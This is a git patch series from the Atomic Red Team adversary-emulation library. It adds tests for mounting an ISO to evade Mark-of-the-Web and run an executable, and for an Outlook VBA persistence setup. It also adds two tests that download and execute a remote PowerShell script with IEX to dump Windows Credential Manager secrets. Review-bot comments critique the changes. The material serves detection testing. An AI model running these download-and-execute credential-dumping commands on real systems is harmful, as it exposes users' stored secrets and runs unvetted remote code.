c7f2e10e..f80a754a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -8,6 +8,8 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a - [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image) +- [Atomic Test #2 - Mount an ISO image and run executable from the ISO](#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso) +
@@ -22,7 +24,7 @@ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon success #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\src\T1553.005.iso| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\T1553.005.iso| #### Attack Commands: Run with `powershell`! @@ -34,7 +36,7 @@ Mount-DiskImage -ImagePath "#{path_of_iso}" #### Cleanup Commands: ```powershell -Dismount-DiskImage -ImagePath "#{path_of_iso}" +Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ``` @@ -48,7 +50,58 @@ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null -Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" +``` + + + + +
+
+ +## Atomic Test #2 - Mount an ISO image and run executable from the ISO +Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. +Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". +ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly +$driveLetter = ($keep | Get-Volume).DriveLetter +invoke-item "$($driveLetter):\hello.exe" +``` + +#### Cleanup Commands: +```powershell +Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null +Stop-process -name "hello" -Force -ErrorAction ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" ``` From 54486ba7a502f99d8e5c4dc002b703d8dd399f6c Mon Sep 17 00:00:00 2001 
From: Carrie Roberts Date: Wed, 9 Jun 2021 23:38:58 -0600 Subject: [PATCH 24/84] force the reg add and fix error where otm wasn't being created (#1511) Co-authored-by: Keith McCammon --- atomics/T1137/T1137.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 58a9a9e6..138d40bc 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml @@ -13,8 +13,8 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f From 2b3f9444ae06dfab3b109162422d2a651b37863c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 05:39:34 +0000 Subject: [PATCH 25/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1137/T1137.md | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 382838e1..4ebeaa43 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
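Review bot: The new `reg add` line still carries no `/v <name>`, so `/t REG_DWORD /d 4 /f` appears to write the Security key's (Default) value rather than the named Outlook setting the test presumably intends; the command should name the value explicitly, e.g. `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v <ValueName> /t REG_DWORD /d 4 /f`, with the value name and data confirmed against the macro-security behaviour the OTM load actually depends on. With `/f` now overwriting silently and the unchanged cleanup running `reg delete ... /f` on the whole key, any pre-existing values under Security on the host are lost after the test, so cleanup should remove only the value it wrote (`/v <ValueName> /f`). The `mkdir ... >nul 2>&1` change also masks a genuine failure such as an access-denied on `%APPDATA%`, after which the following `echo` redirect fails with a less obvious error; the test's name and description sit above the hunk.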
@@ -41779,8 +41779,8 @@ persistence: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 6d0f575f..a7660ba0 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -28,8 +28,8 @@ Too achieve this two things must happened on the syste ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 -if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f +mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` From 1c799637ce172ab2e3050eed39eaa943f2a6807b Mon Sep 17 00:00:00 2001 From: Suman Kar <43452298+skar4444@users.noreply.github.com> Date: Thu, 10 Jun 2021 22:48:12 +0530 Subject: [PATCH 26/84] =?UTF-8?q?New=20Dump=20credentials=20from=20Windows?= =?UTF-8?q?=20Credential=20Manager=20With=20PowerShell=20=E2=80=A6=20(#150?= =?UTF-8?q?8)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * New Dump credentials from Windows Credential Manager With PowerShell [windows Credentials & web Credentials] * Update T1555.yaml * Update T1555.yaml * use permanent github link for script * use github permanent link for script Co-authored-by: Carrie Roberts --- atomics/T1555/T1555.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) 
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index 898b959a..1aa2eeed 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -28,3 +28,21 @@ atomic_tests: cleanup_command: | Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore name: powershell +- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] + description: This module will extract the credentials from Windows Credential Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] + description: This module will extract the credentials from Windows Credential Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force From f12343356726aacd67faffb7222e270ebc3ddea6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 10 Jun 2021 17:18:39 +0000 Subject: [PATCH 27/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1555/T1555.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index 1aa2eeed..e5e80e64 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml 
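Review bot: Both new `command:` blocks `IEX` a script fetched at run time from a third-party GitHub account with no integrity check and no `dependencies:` block, so the test cannot run offline and executes whatever that URL serves; the commit-pinned URL (`4ad208e7…`, per the commit message) prevents branch drift but does not verify the content. Move the fetch into `get_prereq_command`, check the downloaded file's SHA256 in `prereq_command`, and dot-source the local copy in `command`, as sketched below for the first test (the second differs only in the function called). The two `description` values are identical; say which store each reads, and check the labels against the calls, since `Get-PasswordVaultCredentials` is wired to the "[windows Credentials]" test and `Get-CredManCreds` to "[web Credentials]", which reads as swapped if the PasswordVault API is the Web Credentials store — confirm against the script. Both tests print plaintext secrets to the console with no cleanup, so a description note that the output should not be captured into shared logs or transcripts would be prudent.
```yaml
- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
  # … unchanged: description, supported_platforms …
  dependency_executor_name: powershell
  dependencies:
    - description: GetCredmanCreds.ps1 must exist on disk and match the pinned commit's hash
      prereq_command: |
        if ((Test-Path "$env:TEMP\GetCredmanCreds.ps1") -and ((Get-FileHash "$env:TEMP\GetCredmanCreds.ps1" -Algorithm SHA256).Hash -eq "REPLACE_WITH_SHA256_OF_PINNED_SCRIPT")) {exit 0} else {exit 1}
      get_prereq_command: |
        Invoke-WebRequest 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing -OutFile "$env:TEMP\GetCredmanCreds.ps1"
  executor:
    name: powershell
    elevation_required: false
    command: |
      . "$env:TEMP\GetCredmanCreds.ps1"; Get-PasswordVaultCredentials -Force
    cleanup_command: |
      Remove-Item "$env:TEMP\GetCredmanCreds.ps1" -ErrorAction Ignore
```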
@@ -29,6 +29,7 @@ atomic_tests: Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] + auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 description: This module will extract the credentials from Windows Credential Manager supported_platforms: - windows @@ -38,6 +39,7 @@ atomic_tests: command: | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force - name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] + auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 description: This module will extract the credentials from Windows Credential Manager supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f4ac635b..e3e4f0c6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -712,3 +712,5 @@ da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 002cca30-4778-4891-878a-aaffcfa502fa 42f22b00-0242-4afc-a61b-0da05041f9cc +c89becbe-1758-4e7d-a0f4-97d2188a23e3 +8fd5a296-6772-4766-9991-ff4e92af7240 From b97bfd31e604237eaaf8ef147dc634ba36eb8744 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 17:18:45 +0000 Subject: [PATCH 28/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 26 ++++++++++ atomics/T1555/T1555.md | 52 +++++++++++++++++++ 6 files changed, 86 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 958c5b89..0eda063b 100644 
--- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -11,6 +11,8 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell +credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 4835de52..cbe6e63b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell +credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c55b55ee..f6da33e1 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -24,6 +24,8 @@ - Atomic Test #5: Find and Access Github Credentials [macos, linux] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] + - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows] + - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #2: Search macOS Safari Cookies [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index eeb67747..7bc31d02 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -12,6 +12,8 @@ - Atomic Test #4: Access unattend.xml [windows] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] + - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows] + - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #3: LaZagne - Credentials from Browser [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4ebeaa43..686e91a6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -1055,6 +1055,32 @@ credential-access: ' name: powershell + - name: Dump credentials from Windows Credential Manager With PowerShell [windows + Credentials] + auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 + description: This module will extract the credentials from Windows Credential + Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' + -UseBasicParsing); Get-PasswordVaultCredentials -Force \n" + - name: Dump credentials from Windows Credential Manager With PowerShell [web + Credentials] + auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 + description: This module will extract the credentials from Windows Credential + Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' + -UseBasicParsing); Get-CredManCreds -Force + +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index c08e2e0b..76606bc1 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -6,6 +6,10 @@ - [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba) +- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials) + +- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials) +
@@ -53,4 +57,52 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir +
+
+ +## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] +This module will extract the credentials from Windows Credential Manager + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +``` + + + + + + +
+
+ +## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] +This module will extract the credentials from Windows Credential Manager + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force +``` + + + + + +
From acb9c9d55e22ec12387fefd33eee14475a825a3a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 19:40:02 +0000 Subject: [PATCH 29/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.007/T1003.007.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index d6e49b4a..fbadc564 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -3,6 +3,7 @@ attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: - name: Dump individual process memory with sh (Local) + auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. @@ -50,6 +51,7 @@ atomic_tests: rm -f "#{output_file}" - name: Dump individual process memory with Python (Local) + auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e3e4f0c6..55f9ed27 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -714,3 +714,5 @@ c35ac4a8-19de-43af-b9f8-755da7e89c89 42f22b00-0242-4afc-a61b-0da05041f9cc c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 +7e91138a-8e74-456d-a007-973d67a0bb80 +437b2003-a20d-4ed8-834c-4964f24eec63 From 0c19189bf84feff4ccde122403d7f5454b867f9e Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 19:40:11 +0000 Subject: [PATCH 30/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 101 ++++++++++++- atomics/T1003.007/T1003.007.md | 134 ++++++++++++++++++ 10 files changed, 248 insertions(+), 7 deletions(-) create mode 100644 atomics/T1003.007/T1003.007.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index fbe9e18a..836c4f9a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"
techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"te
chniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator 
